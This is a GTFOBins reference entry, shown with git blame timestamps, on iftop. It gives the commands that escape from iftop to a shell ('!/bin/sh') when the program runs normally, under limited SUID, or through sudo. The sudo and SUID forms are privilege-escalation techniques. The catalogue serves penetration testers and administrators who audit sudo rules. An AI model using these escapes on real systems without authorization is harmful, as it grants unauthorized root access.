GTFOBins.github.io/_gtfobins/iftop.md

17 lines
310 B
Markdown
Raw Normal View History

2019-09-28 09:41:05 +00:00
---
2021-03-02 14:47:12 +00:00
description: This requires `iftop` 0.17 and the privilege to capture on some device (specify with `-i` if needed) .
2019-09-28 09:41:05 +00:00
functions:
shell:
- code: |
iftop
!/bin/sh
limited-suid:
- code: |
./iftop
!/bin/sh
sudo:
- code: |
sudo iftop
!/bin/sh
---